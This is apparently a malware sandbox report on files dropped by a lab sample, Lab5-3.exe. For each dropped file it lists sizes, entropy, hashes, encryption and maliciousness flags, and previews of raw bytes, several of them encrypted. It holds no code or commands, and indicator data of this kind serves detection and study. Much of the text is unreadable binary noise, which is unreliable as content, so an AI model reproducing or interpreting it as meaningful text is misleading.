                                                                                                          Preview:........a.+....].95C9x.Hr...7|`apD..m.j....)......p._.[..;9W..~C.w.^...=.b...'..S.....&.JAL.<.C.U...-../g._fl't...7~(.`].W.1=.;j.?..S..._[...L[4.`"..Sx...Q./_+..G/...$$*.)M..&_.A.h..;*.e.$..0.t......r....r.!.O.=..^..[Ut.ED......F..$.I.F3NQ.?c>5....y.gD...-..^k....c>.w.."t...F.......?...vo.../@.....]O#..`..e....yc[.....R..i..v.d.u.. ................W%/.xn..M..[.cU...........s..'...bw..X............>.5..;1.&)...kb..6&.......p._.y...2d.)..%^.......L.u..t......4..-F..\.<.....H....C.......+...[~3...R.....E...H...;...aVi]......N......+...o:.%d.....z.a........6...p...hO....*=...h.u..+..^a...E...](9x`Z.!.F..D.8..S.m...C..-.....7.jo......yG.x1..NG..2.z.B..`...;0....s9R.6..gl..4...d.t..I.M.w.x..t..v...aXI~.-]J....r.UI.5......r.2C~/.....H.....r-... .......T..`....*...>.A.+..n....Wz.m.....I.rOS.4....c.Gsx.;X.?...T..k............#..Bx....,[b^..J..M...Ei./&9...q.@.!M..*....f.6.../U9....O2#C<...rP[6..%..]..u.M.p.......Z{...B...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):367166
                                                                                                          Entropy (8bit):7.978540609945829
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:MZmjwaimC0I0DqMuVKC0u+EQg7S4osdCSRbzqjnnuzdcaSUYq1Q0l7C+XindAZVP:XnimCz0DqMuVKCrQgRdCSRX0nnuzdtSu
                                                                                                          MD5:8C9B809D0AABF043EC883ACD3463F71F
                                                                                                          SHA1:F42A4A451A1E36FD74F3FEAD2769F386355BEE86
                                                                                                          SHA-256:C249F5BA4D19139F2E8C6529614E2DC5227695434E8F182804CE26C9335A1A08
                                                                                                          SHA-512:CC84B3BDB47F0F1EE36FD90477C5735BC001BFA45EAB7E5F080390AFF123F1CEF0D88F861743B79AB3D786C83F97E88656C71798992873CB2C71410D5B69B4EF
                                                                                                          Malicious:false
                                                                                                          Preview:.0.....HxD..8....X.,^.....*......<Uy.J$...5o.V...l..2C.u.....w...~Y&.m.9T.^^...t..|.p.. ..........&.n..S.......~@o.r...|O'......}......d.}...fy...)I.v......{F.=y.dW.]C7G..1.^Y..8t6.....mm.*.;....jX.....!E..y.j...J,v..K.$o./.N....t*.z..k..H^.E@8.{..f(:$:_w~.HX6..ec.z)-.=3..T..B...9.m..b.w.g..|....K.2JQ!P.............(..<)}..v..n.[.F....M4...........L..KD.......a..#U.....$.q...l..........t........_.Z..\B.B.&.+...K..S|Oq....:.....<..?B.Q...-.W_.*.3.....f../.obR..s..`.!....{S....D``...N8.S.....4...'.. .....k.~}..H..H].Q..3.....C...2...._[.9.....j.oOMt."...H.Kz.r......g4.*..`..<M.].!.A*$....P|..........5`..1D'.h~.o~...cr....(.'@h...m.3).md.g..w....U.u.v.'5.t22../....k...1....A...Z<..)(s.........u...TE.....[T..}...cE.e..[.......==..........%.k..&+-....9>.......J$....`.t..\`.k.9.VN.?..*.P.)/.>..w.V.NB.N...+.g6Z.HqM.V.\^.X....9..'.{.R/y..]..]..r~.Z.E)' .Z(.'...b..Mq..Y...%...P)...U.(.^..0..r.qm}5....g...4..U...$.$.Oa.e&...u.L.\s......<H.\.2@'e.4.{C
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):187376
                                                                                                          Entropy (8bit):7.998936436141726
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:K7EKJ7mmCGAxpXrFfgSo8yUGmye2CRitwNvEjgoD9qaFeA8KCeM4gKoiDNr9UbJO:g7U7X6SnyBf6RMwFoDLJq4gKo8N5UbJO
                                                                                                          MD5:1BC05675864315A2C61B252FB6AA5821
                                                                                                          SHA1:3B6FBCABBE00392C3E7AC493A86B881BBD9CABD3
                                                                                                          SHA-256:7B2A9984F50287BA58EC808F6826DB29721B3050D2AD1E311A6C211D5AEA72DD
                                                                                                          SHA-512:EE9C71900B0C1D3E42B60BD0BD94B16EB6EB0F327909AC263E1E85298EB3FAA448A950E93B6D64DDD2C95486953C36E4B9ADA76C5F35C80DE0B1AED9F6030302
                                                                                                          Malicious:true
                                                                                                          Preview:....'`kmR....b..T.P...v.&..:X...q.M..[.o..L@.<.,..Y..2..c.H.Wy.j.....[...@.u...GP..D..ew.9$.[T..h...+..Y..x..J....$R....@:...).U..nGx....?...n...x...&.e...~|0.=.W....6.i..S..7L0..5x!.hU.....U.N.kQWNB.Y...0...."@...0.o.0z$bO.7....:..V.w..w.o.9...aF.....W...rq.^..Z#.|A?..A.F96B8G..........S.B.......1..`r../.%....90.....d.#.A........n..L.)p...L...0.......w%).....)_e...E..h..)tZ.$....I..cw..r.U<y.7u....q.5oP.r6UY...s....2N.r...W......3..MG...%..d.}E..7..B.0...%..>?\.^...v.29..p...:!hv.w.*-.8..O..J.Q..XP.\..#z.`......w...I.{=...u%.-8..j........>.j...p..`........J.tQ`...;Z...l;.n.zX.#..s...]}.^E.iH..y.aYz..YP.<>..?..Q..I..'...C.VW.Z..f...{.Q}v.Y...0.....zi.._.. [0=7...)X.B.....v..6=..G...>=...QJ.H.T.7o.1.t0#l.`..Y1....lN:]..W.m ....3s..(....x.<.:.)&Jm[.g(. .v .L#o..l....'......x.i.6...9.......cf....J".U...D...g6.V........../.m~..m.\.....'..p=8.z.....;o...'Y.;..O.B8..}.....OL.."Rf.<.(.....m...i........d.Bw..c......*....i....2wn.7.%.F...LiC.U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):344292
                                                                                                          Entropy (8bit):7.995220080195692
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:DbKwdyaBVHyTD4diZEh38KY0h2XWUIYLzNHfyh2UT+3rAKxpSQXT/wOUg9EhF0i7:Pw8QA4WZJh2mQhfRUirAKxpZXj4F0ikW
                                                                                                          MD5:CD37E00F2F57FA8A982F38A01BCCD3E6
                                                                                                          SHA1:27CF74DF94DE7D382A15C87F9200CE9BD6CC0B32
                                                                                                          SHA-256:BB0FA10BABEC0DB2D6B2D4EAB6C2BDECD157128EB878EAFB9D6D2BD5688F50C5
                                                                                                          SHA-512:10173A358DCE88E168FC82B75F4B0E5573BADDA8D96698B4102BA088529392D32577DC08067C39B3545F535ADF7CC31538A78F76301C82B39EBE294A5CDD6769
                                                                                                          Malicious:true
                                                                                                          Preview:.>V.f..{.1o.y.C...I.....9x..7*`.7!}h._<O...*..U!.K.b.....Zt..]......_.B.b#zY.LM..!.r.h..UJ..K.....?.......8..)...&B9-m.5#.;.v.....5.7.H..lY.......jM...!/e......@..9t<^.B..s.6..o.%-..`.._...?.r....uP..8g.\.....BD.^^.DN...<....ab\...!Y`.%./.zR0....T......n...EYBk......$.(....2%.H.L.!h...$...CR..+...H.9.R>.A~.U.W..T.TD...2wpV..P..q..7..6n..C^$Tt......>yRIM.........k...:...2T..u}`{..$._.?tHHg...r..-.H...q..>6...n!)...Bh.t...S.Z] ..B.....UysEG.b.V.D...'.(hzF..c.U.....P>.R..p?..0.n.%1:..t...T/iM..t...F{..W.k.._.SB.'..r}e....Ww...KM.v#....$.*....1./.D.$.i.....s|.........n.V,..-%.[...fu....k...@...H.....9.$Z.s..m.v.R.9`vW.........<.'.\.]....D..Y.0~..%.N.............5..~.q.1..Z...u.q8..A....%......*... ..............H1...b...&l.9.XB...=.`0A"...U5.N4e.R...W...y".......)......'.,sa&&.SHu.K.qz.E...d....A..O..^td.`.(O..B..#r.}...[.@..0k...I.#.W...g`b..(..x6#%!!|...."r.....e..b..].......4i........>...H;2~....u...?[Q..A_[...g1....l.\Zi..kt.&%...3[.^Y0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):664644
                                                                                                          Entropy (8bit):7.964611996035038
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:ryiJKtTYB9tQneqeHHcIkZq9um7VJReHR94CR1o8CF8sZVE:2iwtTG9GneFcDZq9LleHRGC7oNF8MVE
                                                                                                          MD5:000A01A7DD443C4805D56020975F4668
                                                                                                          SHA1:B1DF541A2CB66C6576D685980141B6A7342552A7
                                                                                                          SHA-256:BA168FAE697AB4CA40A4D7F420AC00CD2E4B304271CD8D2C722EACC9C616D609
                                                                                                          SHA-512:F7FC37D1AF2F78A494D5553561509CD37F879B073EF9DC7F5EF0D1D32C067B7C119CEC076FE50AD89BEF79BE0B62D45E60CA8A159ACCA00AE1BD203BBE9CEC59
                                                                                                          Malicious:false
                                                                                                          Preview:...[.v..u.X`h.Q.s.x...KK./.hXk..)8-....moJI......6G......lu.d...!FY..m.Y..Pl.}Eq.T...HZ~...Y.P}...x.%...;.A..=.FE8.DM.8.>.L.......y.}........FE...PF.. ......{.....t.m.Q....@C.D.w...7.^.9.0.<R..I.d..........~.......'*...c..7?.N..wD..-.....V..@.\.......5.CR..R..OK.0..z..Nl..T3L0....N..hNzI....H&.[..Q...B...!A.c...d..p....).rMX.Lzb..^s\.,g.<N.,.K..P.^...qHi.R.}{S....D... x....+..9.A..RO...*T..hy..7...................rA<....i:.`..d-..s4.....$.&.T.^h..0#z...k&........U....&.K.._.z..-P>H....].H..$f...[..c.#...%.y.....jM'...............y1.....hK....b..Y.......!.U.`#.e.G..X.~....]..L.(J.4?.;.As....].........g).-.2.{.+........_..F...x}..k........)..*c...r....Z[(......X.^:b....w..7w..`q..n|B..Y..eq@.2|..,.. ..5TQ.K~.....q...:W.cfxT.....d._.....4....a...V.-.^.X.t4.N5G.....m..b... 5..E...P$....$.a9.&m.,.#..&..1K..L.G@.xn;....L...1...j'K.......G..5.2?4..sD|k...".m.?a..6....R]...... $.+o.l......Z.V......z.Rx8.icYY.n....b.o...~.9).....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):435315
                                                                                                          Entropy (8bit):7.962572060068975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:k/J+uh/4Wdk6neLFzuhvpzoO28TEDP2SI4lNTqsjRqLR2Ff63Zx23FBpumpJeWQv:kkKk6ulmvpzD2eEDP26+gY4Pp4WiV
                                                                                                          MD5:05DC7983E4DB157AAF901F73C253BCC5
                                                                                                          SHA1:4478410DE6C4FA8048E74FEC6F11EB610C07D10B
                                                                                                          SHA-256:772F7344DCF7807E86AD93F14797B1F6B5D941BCC9CB0F02CA2330610F0500EA
                                                                                                          SHA-512:ED11774A4E26E909C5ADA34D83D8E61F22BCA2248C8333FB34F347DFFC0155969C7E93A5E967B02C2E263766BD332992211241B25C591F5AB6D205E7CDA02711
                                                                                                          Malicious:false
                                                                                                          Preview:.0.].:{.a...=o..`.._..^.A..b......[..zA...m.............5e.co*M.K...;.P8.'.....x...^...=..`.n}..1.C4$..{..cOF...^.T.<#Xv..8....)j.O.....o._;..B.\6D....c..$,..k....-..ho.}..j.,v3.k.9.n.W...@a?......Q.......%.H.;...jT]a.8...d.d..Q]...,7T.?...&..`.]5.R=....=..HG-.x..O....X.J........FD.r-.........DS...$w.p.F`.D.c....{P...............|..G..U....?C.S;.CT.!..8C..n.32....8....p6.]...K./...8$.q$lY0.4g.r..-..H..%...c.#.I......gFLw)..?.#N7.cxv...)..Z&.(.D..G..H.=..aS...7#.y.C?w......[)T.w..[.#....t.ocX..R...-.....C$f.b....O_..&....zLx....]^.KU....n8Z...K...>..lX.^.y..np..t..(v.i._....F..+S/..%..&......F..%..D.9{.....69&.y..i.....v...,..Y...........O..P&YpsF......]@.8.l..{9>..V.3(^.A..I.8...<U.8U..PY.......l..?......E....4O..y..i...,P....=..D"%....g2..P.'.d.q.G\.nU..><..b....=w..0..57.D..%.!N..t$..M7......H...... .:V..7Fg.0.^....Kz......z>...../...i.v=....R.7.D.,1...u...s..T..Z..%.5.f^s94C..L.E.c....j.+..E..+.+../.U..o6PY.b.....!..e.iS..8...%...n5........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):714766
                                                                                                          Entropy (8bit):7.992460810444224
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:9MkLH5RuQmUONCFK35cr9EhcPLNdB7CEvwthnirqlYOrvEk3rJDFNf4a84pu78F:ukzLDwNCbu4BKPG8YOrvE+rTNENG
                                                                                                          MD5:9B6B076399B055AAC5B92317AF3BFCF6
                                                                                                          SHA1:A0A14B456AA0CBE3C4372AC4807F0E4BAF96711E
                                                                                                          SHA-256:6BAA43BBDDC8A9A4E180C08E30AAECB980175D95FEACEC5D74846A739F79362D
                                                                                                          SHA-512:852B5E13983B16BDE444B84AFB72D328D40096AE9E420D2C99340794F452381D391A76CCF358B2F7C4C8D7F6245A8352C8FFF962B453E6A1B1DC093C19A5017A
                                                                                                          Malicious:true
                                                                                                          Preview:.T.9.o@|....\.tp....*....~&....Lx#.....7.u&.&H.Z.f.~kJ(9...T..].l..5O.f.....&..vT.j...?.,qz.....As..z...L...T._g..M&.xu#.qn.i.B.../..0.N.mO.``..<..gM9|..=. ..-uf._4....!.u.).KB.V3.}|4......<.H...1gg.g.....-?...a.3.[.'....G..D..#.V../.&..e.......j..@^......|s9...U4.....4|L....8..B..._{w..8%....'.C;.gT.....5......!.+.N.e.......?U.5..1YS;...'..g[.F.|....[u..6z...tTPV.MA.y.[..H*.>.j.K..V...Z[....Z..w..h.=..k.qr#...#ly..]..w....8......U...d...F...c....f&A.e....ulL.X.)...R...r:F.H6A..W...t3..zv.......8k.f.E ]...Kr.....-..P.1...4r',.b$....sa.dO.s."z.+..m.....NU%no...z=R.+.N..8E7c.]&.....K.z.%.D..p._.....M..9..Z.-...O.|i.'.h...(..0..S\9.C0...6.......n.5..l....0..R...(WT..C.t..|...+.f..e.dV....I..1=k.!..9.......*c.p9..:>...y..Q^..;^yy..lS.....%..p.wxr....h....V..........RG/.!...~.........|.J..|KA.{.h.s...#... z.."%K....../...>.'40..|...t._...obS.LS...7...g.....76_a.d2. .z..sY.cN.\Qa.._vy......5L.....b3.......E..UP(x~...e.K(C.'.B`...E..W.j.I.c.......0h
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):527102
                                                                                                          Entropy (8bit):7.989765199129382
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:Y3bJT63hkX8o7t1xoZtQXrDZV0rwl01fITm0HsE+Rcj:QJT6qso7tstQbdV0r7gi0Hocj
                                                                                                          MD5:EBAFEC48E868C08CDCF4BC2CAE5A9B2E
                                                                                                          SHA1:770B33608EFB7456291D23A5460CD11E9F46BF93
                                                                                                          SHA-256:CD3EEF647C65B7D2A47209E957A8C29ACFDF295EB2C2ADC7E1E9EB51E96B7803
                                                                                                          SHA-512:1174700B3EACAF2067AE0F3EA5D78086F0D27A61FFE879FAC9BD19CAAC1E16DD0D7E0277C973CA27F5DF2DBD51E8A1F393CFA8F8072A15CDA8E22D1F48D43DC5
                                                                                                          Malicious:false
                                                                                                          Preview:.zH.A.@....I...M8.w.....;..'H"1.#C.N.R.B..i.......q..9...m.s.lwQ5..M....P.....e..~..B.f.."0......d...q.f...]....9 g].....`.[_I..7..z.?z....B].C....M..%.J.....{.....u.2.O..}.'..g^W!9)U?.K.>....% ....u..-.A....A..=..=.6@.@.+..[..,..y7..L.......*...K...)./7....x.$.7..n[l^3..N...H.S..H9...2l.u....C.. ..1S- ...Os.W....W3.....@.f......~............`..'..A(..[.,.a....D..R\m{....j...vk.2.......!.J..'.c ...Rw..H.VJ...R./Y>.L...l.....R..Z..G. .........e2../..3.9.......F.e^..T.v.c.w..,.X..qe..%i..ILe.!.Ax*.j.+..y..$..{..>.P}.qs.wW...h1...[...2P5.K...x../.......W.ggn.].$...ngd..N..7....E.]..p+.B.'.!...|.X6;.^T...|.>...........F@z.<9.a..G(=...9T.'...O...s...|D4R....O..n..-.=F........z1.....j.8...~M.T.......W.nm]...p......*aC3.7.q......v4..m..&...o.....EX6..e....R..o....Sc.......e.,..............%..rB.v.......o.q.)1.....2.-l=0...-.{U....Qb^..._so......A...;z._..WC...).%... t..k.+7...jF.....!E&._CH....k...1.d.M..g..;.>.&.S..9.-h...:;.....d....e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):721082
                                                                                                          Entropy (8bit):7.992580290353968
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:XuZ60igkQt21ic509KOteYDW3LH0WDFjpSNtD97WU0aAG2DFg/T7tp:F0pkQo1iW8DsNot1YGrL
                                                                                                          MD5:7020D8CCC7F1EAAAF9028789CB2D5D65
                                                                                                          SHA1:B633488B5F1E219C2A175E4E57046F1A9CC0E999
                                                                                                          SHA-256:8CE4A2B005CF18DB49CB064C1ECDF580001E4AC6B63FC44E7FE6A70C991EC946
                                                                                                          SHA-512:72DC962C0CC96F11E337A9E8A791F32DE74152FBE8B154986657EF99B1F1DFE362F07B15B120F86646FB3E5C2074F64E2871682BA9288BB7CC7C1CB5996C2BEC
                                                                                                          Malicious:true
                                                                                                          Preview:c{....`.x...vz.j9.J.....V..}9.h...Di.....r.(.....`.....<T.....&D0.$l.&....k@.. .![R..qg:...}./Fd_.....6.....Y.a.b.3.q...../..:..".O ..?.J|.....15....+|..n..#&.$.?J...Se...Z.....8M.....d./;T.!....3.eI7B..XG.....G.._ J>....3<......!..2R..,TY.1`.O.p.T.%.A............o.#.x.>..~......G.........._.Mn#...(....p.t.!)-.=x..../....$.^.....3.m..P<:.\&qR..PI.~0.....86...L,..w..K..\...y.5..H........t....\.4..A.."..*.......p9...C3#.%.2..wn.............E%.v.....b..)^.{.P...n.....C.....#?N.J~."(.... LZ...|`.~..!..k2..aF.......O..5..;_.=...u;0R..6>]P....d.+.`....S.csf.Y:.......0...T.:...#v.}......nf\.z..O|...Jh...a..u...^...*.......jy.w.U.....9.l3.PE...<.$..D.'...1.....U.gE,.}H.../......N....f}..............CF..rjm.;V`\..D.j....7.j..Ns..a.Z...p..T.9..2X..sR...3n.;...Y.gf.L.....^A...}PI........Z..3.E.p.V7=9|.q........M.(.TJ@.....k.S;$.;.td&....[...z.F#`.~...[.....c....U...[z.v.u.&...#.LR.,X;.sd.e....A._..0.....t."^..;%...,..<...Y3J......!...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.940427470048351
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oPkCip/w5SdLwlrN2NrUfhKIKliHfUTid3hBaUoSGFcmeykEdEElU92i:o0p/mSFc2NUKrPGx0uKeY2ElUJ
                                                                                                          MD5:45233E9CFF5715F666CB375061FB0795
                                                                                                          SHA1:2B022C9D4A30C09E4C1993A419E42B3B48E023C4
                                                                                                          SHA-256:1A6C85AEE37F2DE696B43C4DF574D53E8FD808C9B72A8C0D3BC378E9D49346FF
                                                                                                          SHA-512:A48B8A9A55B1DBE09D3E49E2506056D3D17C7D1DA94E57E894BCBD86977DA4E2DACB69AD1D11F1FA299EF0EFBF605A197761581EF9EDB349D9F4E6EFBE51AD95
                                                                                                          Malicious:false
                                                                                                          Preview:.@k)..I^bkz|.u.]......X,.1..j3."f.g...u..G. ..h^%...].-...Z..J....D..m....7..4...Y.th.U!..~..h.^....=..3..1yQ1..|....a.v..P...].[.LC.By.<...|....,j.{ H...&O....Dd...h..^jI..WV*.-..4.#.^.Dd.G.B...'_?.Y.Bq"}.G...x......~O.K...2<..gS.b.{$W...U...u....j........L&.h.D.y.j.H3...&Wk).b...Fo.....2........s....u./_......1.hC)...H..yS....g.%....*&...w..}..9.6]6.5.i.{...."0*..~..R.YBk..Cvs..S5E.p.d@.F.....ZJz...\.9|y.+Nt3...d....G.y;.%...)"..-nV.........(..G.a.c.....Z!aL...././..dE.f......wEr..Iz....s.z_.(..4.$.x..C.7v..`..]...\1mL.'@Q8>..60.h..lx.lS.K}"z.........*.AKDM5.>@\...x..uo.~fm2.......1.._.v...B....$r.[.,.ND'.H.. `.hSW;...R.>.....j....-H;7........$FZ....>..<...'..6..L....;..+...M....*c..@.o;.bs..@B.&P..M=F*...Lh'.X.......o{.jy..r@_?Oz.UpQ.D..q...h..W.t..l..+..I-{. P.......v~...;.l_...e%..=.}I..G...S...2.9..F...\..i...HF..S(`.r...Ig.L...U.uV.<x.(..B....kc....B....Z..Y..A.+d...usU.85G.a..R.........%..fqV8..g..;....}..-..|.=y6.U.`..FH....:.8}.k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6144
                                                                                                          Entropy (8bit):7.969785288212062
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:uc+h1TFt9cjAB3RIk2Sw2aljkK4eFrkLGK4Gx0uKeY2ElUJ:ucG1pt7lRWZV+V0Cb
                                                                                                          MD5:FFAEB39752F0A07CD8315A9348971B90
                                                                                                          SHA1:EF67CFBDA6CA3AEAE9D82F121CCEA3A0E50BEF7B
                                                                                                          SHA-256:162A2F39615D0AB07DCE274F2D5D72FFAA54B842C0008B339A3AFAB17C63C868
                                                                                                          SHA-512:DA813C399AB2F5A941626CF82C444C62EBF60C2892E1219833A81174128A780DAE7992F90F923E3A7A8BD99D85D98FD927055267E251ED33F505D71A42B3A5C4
                                                                                                          Malicious:false
                                                                                                          Preview:.<WCO..c7:..U*8xb......h5....J8,z.;.a*..i.`.E.(=...B......T......."Fm."`/.Q.Sx..xc....h...o..v....0..o&..8..yt.J.='.)d..k.......dI..s..^..%...{UG....{.P..z_.A..Qvr^.D........2f......EnM...T[W.+SF.....-U..>t....B........TN=T.W....z..o..=..|rQO.W....r.x.d~.L...:uH..W....[C...o.F.'.2r.>u....q.......>.zt....h].Qcx...b.....#10h..."....Yp.G...Mg..GM.Bv.H..hx..?....B.S.BZ..A.6..mg.s,C'......pG9.F..O9.I..]<.>..5....&N......P...-...>.O..'...s..&.......\..Q.:.......j....b.....P..a........w..n.~L.....Mcb.&.m..x,..M.d.7...-v.....:....B....Q8.l..V..b.D.[.l$.;.(Xs&-.(....z....6..Y....M..H....j.........w.Q.!.{..e....kT.wn[.}...M...hfB,x..;.p...^....Ci.1".k.-H..f(...h.....P..;KS.`..8R.C..Z.....A.M..:.R.d.t._.ah6.>.HV.g.).at'.)r....v.)..U.7...]h.B ..O...P..{|.M.......Xg"V.#.{../.......#A.2v..5....0S%B.W'.%....T4..+.IOW\.).?.ee..#i.......n.....A.e.C.Q..G.E....C...Q`.l....Lw...f...)A..p...@...v2M..Zx/V..HD..xi...o...S....n...%.|...U49o..."..e.@Ln.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.919999439162624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+Kg7fTBvzg7R0qSMtbHfUTid3hBaUoSGFcmeykEdEElU92i:+KYpzgGTGx0uKeY2ElUJ
                                                                                                          MD5:CA3177CA934D953A3AFC8403F392DC5F
                                                                                                          SHA1:533939CDAC2AEC081FCCF6AE9B0A9132710B058D
                                                                                                          SHA-256:820E30254D75758AFDD4E9DE460CC6692F3A4C033B70F551A615223AA25ECB1A
                                                                                                          SHA-512:23B8F3FB7EAF6D247EF16724D05136ADF2E5845F917CD5714359E042533F716AE276EF0833A7E4C414A3CC280816A0C12EF75BF168459AB8D044AA1EF069DCA9
                                                                                                          Malicious:false
                                                                                                          Preview:......nZK.......e......-i...r.p.f_....V:;.b..._..lI.+...hp...2.....\=.b.FW.s.M....p...v.K.Uv...O...<Q........S...3B......(6Q._...a..g5....IB..]..l..7_s.>...~...\...5v&^..s.KK`#..f..\u.E..Tl...F..7.6.P[.Y...p=?.{...t,.w....W./..t.:......."udd69].B.e.q^.*3..bf..N..v%.J.B......V-..:...5.X.`Q....w...MGe..3.........`:km....Z...*....`..]..m../.k.......G0{.<.V8q.2..!.m...Y...V~...gs...p\....d..........h8..,7...|...k.?..#..$..C..2...d.x7>.*su^..VV..v%s@.Wi.q@...2Wy.W.]......."...z/Y-.._....M./R0..y.....Sn..{.+~}<.5zk..`Y.?.w>.~...4$.roq..m......Q,......>.3...X>u..pR./...O.....W.N..h%4...!..........#..L...n..a9JW.......!o...OSP'..D.9(p..:..L.|.c.c*.u..+F....-T.S......Ko=.%...f..)g6......D.[.dAL...Gu}.$..h`.:.B.S.x`m.s..T.......P{...c.,....u%......d.[.U_......H.(#Z....?...........7-..a+..By.(.....[.u_3...L...t....T.>..[..Uq.}....?v..BH..3..l.eP......$S0.BQ..b.n......S&........Q..C.{96@.\..1..V........^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.935282247937084
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6Kv8CdS0tftVRpje3vFvYbOp0sNGXzHlfSHfUTid3hBaUoSGFcmeykEdEElU92i:HkCdS4VVba3v7qsNAzvGx0uKeY2ElUJ
                                                                                                          MD5:371A1B00F01F7D86CA48C533CC5C6AB3
                                                                                                          SHA1:41EE56A2FFB985543019E0C34E62EC0A4F0AE1DF
                                                                                                          SHA-256:5B2F113067AB4AEC902E81362AD7EA11E48BF89953C9D9D80D1D21B4F6428423
                                                                                                          SHA-512:986113C3073265132BED72F7C18AB49DF3B03DEF0AE6AA423145CA714E19D4037DBD118A38356F412C710816DC1F0A9C923D2E85D560D574D45F3FAD84337BFA
                                                                                                          Malicious:false
                                                                                                          Preview:57.D!+..D,...L....)!..&........BbD...0:..8..i...Yl&...N....uiZ0..#%.%......wz.RR...EY(!.V..S.kD;ZV.1.4..nf$.%=..P+.:.y..[....yg.....Y...r..9.......mJ... ..........n9...s...2...?R}.1sK\.?......".)J.a0..ht........4..M..*.Q.?..u-IQ..?.4?.....n..l..&.G6a..p.........}..{.....wR...c...'O...h..68.k.$.N....d.j.L..x1...I.......!"...H...\j....c.t.1!....7#....Tnz"..Y.....A....4.l#..\.AI?.............E .iYY....+.1.y...?...1...Dp/....@d..q{...Ly/M.T....hh..v8J..g.h...C...G..It..x1....rg._T-t...h...........}-..g.}.,...NFF..._..w>Io........r.E)J..l..X.Ip*M.8+j6.w.....X......w.q.\..ft..C..0..zz+......b..%....._/K..oO.(..^)!...~......$..$f ..2....X2v.'.p..:z..0..........i0..[..?.P...AX...<.O.b.B...K.Sh9..>.S.S%..E....3.mVCl...3xk...Cf...ob..P.JJ9..C.......s).XF..H........R.....h...7K.N..._^.e......}.?...t,..6(X<.).]p.]gYF.qH.....tFL.P. .h.)g ...s8.!.L.....4../......hC.Q...`.9} ..._...T...........X[.<..5.Qg...>..:.c...yR.....f.&.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.903618486484887
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Dq11ID6F3zHlHfUTid3hBaUoSGFcmeykEdEElU92i:hWtzH+Gx0uKeY2ElUJ
                                                                                                          MD5:106B20DAB06217C4499B9B03E48034DA
                                                                                                          SHA1:8893396D90FE296BAC670C24824C4BA16D7291E7
                                                                                                          SHA-256:3ACFEDDEF313204C1F5B60C7F3355A89D9A23C841174A7E7AD79B8DF155E6D88
                                                                                                          SHA-512:9404A605E34FF0B37066AA9646E8154096DB8D0FE00D07F24C808BC210C53D70A08E20374FF074F208B2F4E640576D340BC889EFC8F8D00D43442C79A8534EB5
                                                                                                          Malicious:false
                                                                                                          Preview:.yF*.8......].2j..iIq..V..i*.N~.O.y.X.0S.0.f....\....#....;.^D..aA.'....(.q..zl...1.v...G.po{w..ob..{..}..o.....C..6.......,..c.........bg.T...-c..,.ysR......!....=.Uq..K]..%s.......U..c.....~.!.^era.z&....U.&.....Q5...9.^..;...... .;..,.L.74..k...0....$...... V..(...}...z....+f.... .......B.3P<....F.nJ4^u.[W..h..n.@~M#@...q..s.J..K.......H.RSW..........H...m..L?WJ.x_.E.0.3.......9..;.i....Z......m m...(..s...@..#.h..7.)%..L.c.b......Vw..~.E.K....]u=...aEPQ...H.....+_s.....&......B...e.*H!..(...).Sy..q.6....Nc.. ......*v5-..`%.].^.Qw..Hpl...& .+K.....~.D5..P...?.O#.N~.(Rm..N...V......&.N.4...VPV#.o..../...C&.K.t.o.{M.......Pf.......<V.Y.=?..[+:.c.YUW...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.9175457359514025
                                                                                                          Encrypted:false
